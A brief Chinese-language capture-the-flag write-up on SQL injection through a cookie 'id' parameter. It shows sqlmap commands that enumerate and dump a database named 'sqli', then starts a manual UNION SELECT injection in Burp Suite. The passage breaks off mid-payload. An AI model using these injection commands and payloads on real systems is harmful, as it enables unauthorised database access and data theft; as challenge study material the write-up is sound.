sqlmap 自动注入:
因为这道题之前俺写过,当时用的 sqlmap 自动注入,具体就三条语句:
python sqlmap.py -u "" --cookie "id=1" --dbs --level 2
python sqlmap.py -u "" --cookie "id=1" -D sqli --tables --level 2
python sqlmap.py -u "" --cookie "id=1" -D sqli -T frkadyqcec --columns --dump --level 2
用 sqli 数据库,查表后逐个排除错误答案获取 flag
Burpsuite 手动注入: 这次尝试一下手动注入:
id = 0 union select database(),version();
forward一下,再看已经变了:
数据库当然是是 sqli,于是继续注入:id = 0 union select 1,group_concat(tabl